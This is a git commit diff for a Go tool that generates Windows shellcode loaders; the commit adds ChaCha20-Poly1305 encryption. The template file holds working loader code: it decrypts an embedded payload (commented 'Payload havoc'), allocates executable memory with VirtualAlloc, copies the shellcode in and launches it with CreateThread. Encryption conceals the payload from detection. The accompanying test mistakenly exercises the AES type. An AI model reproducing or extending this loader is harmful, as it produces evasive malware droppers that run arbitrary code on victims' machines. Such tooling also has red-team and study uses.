feat: add chacha20 encryption (#11)

Signed-off-by: Vasek - Tom C <[email protected]>

Author: TomChv

encryption/chacha20.go

@@ -0,0 +1,40 @@
+package encryption
+
+import (
+	"crypto/rand"
+	"golang.org/x/crypto/chacha20poly1305"
+	"io"
+)
+
+type ChaCha20 struct{}
+
+func (c ChaCha20) Decrypt(content, key []byte) ([]byte, error) {
+	aead, err := chacha20poly1305.NewX(key)
+	if err != nil {
+		return nil, err
+	}
+
+	nonceSize := aead.NonceSize()
+	if len(content) < nonceSize {
+		return nil, ErrCipherTextTooShort
+	}
+
+	nonce, ciphertext := content[:nonceSize], content[nonceSize:]
+
+	return aead.Open(nil, nonce, ciphertext, nil)
+}
+
+func (c ChaCha20) Encrypt(content, key []byte) ([]byte, error) {
+	aead, err := chacha20poly1305.NewX(key)
+	if err != nil {
+		return nil, err
+	}
+
+	nonce := make([]byte, aead.NonceSize())
+	if _, err = io.ReadFull(rand.Reader, nonce); err != nil {
+		return nil, err
+	}
+
+	// Encrypt the message.
+	return aead.Seal(nonce, nonce, content, nil), nil
+}

encryption/chacha20_test.go

@@ -0,0 +1,47 @@
+package encryption
+
+import (
+	"bytes"
+	"github.com/stretchr/testify/require"
+	"testing"
+)
+
+func TestChaCha20_EncryptDecrypt(t *testing.T) {
+	type TestCase struct {
+		content []byte
+		key     []byte
+	}
+
+	testsCases := map[string]TestCase{
+		"encrypt a simple string": {
+			content: []byte("hello world"),
+			key:     []byte("0123456789ABCDEF"),
+		},
+		"encrypt a golang file": {
+			content: []byte(`
+package main
+
+import "fmt"
+
+func main() {
+	fmt.Println("hello Go!")
+}
+`),
+			key: []byte("0123456789ABCDEF"),
+		},
+	}
+
+	for name, tt := range testsCases {
+		t.Run(name, func(t *testing.T) {
+			chacha20 := Aes{}
+
+			encryptedContent, err := chacha20.Encrypt(bytes.Clone(tt.content), tt.key)
+			require.NoError(t, err)
+			require.NotEqual(t, tt.content, encryptedContent)
+
+			decryptedContent, err := chacha20.Decrypt(encryptedContent, tt.key)
+			require.NoError(t, err)
+			require.Equal(t, tt.content, decryptedContent)
+		})
+	}
+}

go.mod

@@ -5,12 +5,14 @@ go 1.20
 require (
 	github.com/spf13/cobra v1.7.0
 	github.com/stretchr/testify v1.8.4
+	golang.org/x/crypto v0.11.0
 )
 
 require (
 	github.com/davecgh/go-spew v1.1.1 // indirect
 	github.com/inconshreveable/mousetrap v1.1.0 // indirect
 	github.com/pmezard/go-difflib v1.0.0 // indirect
 	github.com/spf13/pflag v1.0.5 // indirect
+	golang.org/x/sys v0.10.0 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 )

go.sum

@@ -12,6 +12,10 @@ github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
 github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
 github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
 github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+golang.org/x/crypto v0.11.0 h1:6Ewdq3tDic1mg5xRO4milcWCfMVQhI4NkqWWvqejpuA=
+golang.org/x/crypto v0.11.0/go.mod h1:xgJhtzW8F9jGdVFWZESrid1U1bjeNy4zgy5cRr/CIio=
+golang.org/x/sys v0.10.0 h1:SqMFp9UcQJZa+pmYuAKjd9xq1f0j5rLcDIk0mj4qAsA=
+golang.org/x/sys v0.10.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
 gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=

loader/chacha20.go

@@ -0,0 +1,41 @@
+package loader
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"text/template"
+
+	"github.com/cmepw/221b/encryption"
+	"github.com/cmepw/221b/templates"
+)
+
+type ChaCha20 struct {
+	baseLoader
+	encryption.ChaCha20
+}
+
+func (a ChaCha20) Load(content, key []byte) ([]byte, error) {
+	tmpl, err := template.New("loader").Funcs(template.FuncMap{
+		"key": func() string {
+			return string(key)
+		},
+		"shellcode": func() string {
+			result := []string{}
+
+			for _, b := range content {
+				result = append(result, fmt.Sprintf("0x%02x", b))
+			}
+
+			return strings.Join(result, ", ") + ","
+		},
+	}).Parse(templates.ChaCha20Tmpl)
+	if err != nil {
+		return nil, err
+	}
+
+	result := new(bytes.Buffer)
+	err = tmpl.Execute(result, nil)
+
+	return result.Bytes(), err
+}

loader/loader.go

@@ -13,8 +13,9 @@ import (
 
 // Method gather all loading and encryption method.
 var Method = map[string]Loader{
-	"xor": Xor{},
-	"aes": Aes{},
+	"xor":      Xor{},
+	"aes":      Aes{},
+	"chacha20": ChaCha20{},
 }
 
 type Loader interface {
@@ -39,7 +40,7 @@ func (b baseLoader) Compile(outputPath string, content []byte) error {
 		_ = os.RemoveAll(tmpDir)
 	}()
 
-	err := b.execCmd("go", "get", "-u", "golang.org/x/sys/windows")
+	err := b.execCmd("go", "get", "-u", "golang.org/x/sys/windows", "golang.org/x/crypto")
 	if err != nil {
 		logger.Error(fmt.Errorf("could not install dependency"))
 		return err

templates/chacha20.go

@@ -0,0 +1,112 @@
+package templates
+
+var ChaCha20Tmpl = `
+package main
+
+import (
+	"fmt"
+	"syscall"
+	"unsafe"
+	"errors"
+
+	"golang.org/x/sys/windows"
+	"golang.org/x/crypto/chacha20poly1305"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var (
+	kernel32 = windows.MustLoadDLL("kernel32.dll")
+	ntdll    = windows.MustLoadDLL("ntdll.dll")
+
+	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
+	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
+	CreateThread  = kernel32.MustFindProc("CreateThread")
+)
+
+var ErrCipherTextTooShort = errors.New("ciphertext too short")
+
+func decrypt(content, key []byte) ([]byte, error) {
+	aead, err := chacha20poly1305.NewX(key)
+	if err != nil {
+		return nil, err
+	}
+
+	nonceSize := aead.NonceSize()
+	if len(content) < nonceSize {
+		return nil, ErrCipherTextTooShort
+	}
+
+	nonce, ciphertext := content[:nonceSize], content[nonceSize:]
+
+	return aead.Open(nil, nonce, ciphertext, nil)
+}
+
+func main() {
+
+	key := "{{ key }}"
+
+	// Payload havoc
+	var shellcodeBytes = []byte{
+		{{ shellcode }}
+	}
+
+	var shellcode []byte
+	shellcode, err := decrypt(shellcodeBytes, []byte(key))
+	if err != nil {
+		fmt.Println("failed to decrypt payload")
+		fmt.Println(err)
+		syscall.Exit(0)	
+	}
+
+	addr, _, err := VirtualAlloc.Call(
+		0,
+		uintptr(len(shellcode)),
+		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
+	)
+
+	// retour d'erreur ( quand on appel la lib )
+	// TODO improve error checking
+	if err != nil && err.Error() != "L’opération a réussi." {
+		fmt.Println("failed to alloc memory")
+		fmt.Println(err)
+		syscall.Exit(0)
+	}
+
+	_, _, err = RtlCopyMemory.Call(
+		addr,
+		(uintptr)(unsafe.Pointer(&shellcode[0])),
+		uintptr(len(shellcode)),
+	)
+
+	// TODO improve error checking
+	if err != nil && err.Error() != "L’opération a réussi." {
+		fmt.Println("failed to copy in memory")
+		fmt.Println(err)
+		syscall.Exit(0)
+	}
+
+	// jump to shellcode
+	_, _, err = CreateThread.Call(
+		0,    // [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
+		0,    // [in]            SIZE_T                  dwStackSize,
+		addr, // shellcode address
+		0,    // [in, optional]  __drv_aliasesMem LPVOID lpParameter,
+		0,    // [in]            DWORD                   dwCreationFlags,
+		0,    // [out, optional] LPDWORD                 lpThreadId
+	)
+
+	// TODO improve error checking
+	if err != nil && err.Error() != "L’opération a réussi." {
+		fmt.Println("failed to create thread")
+		fmt.Println(err)
+	}
+
+	for {
+	}
+}
+`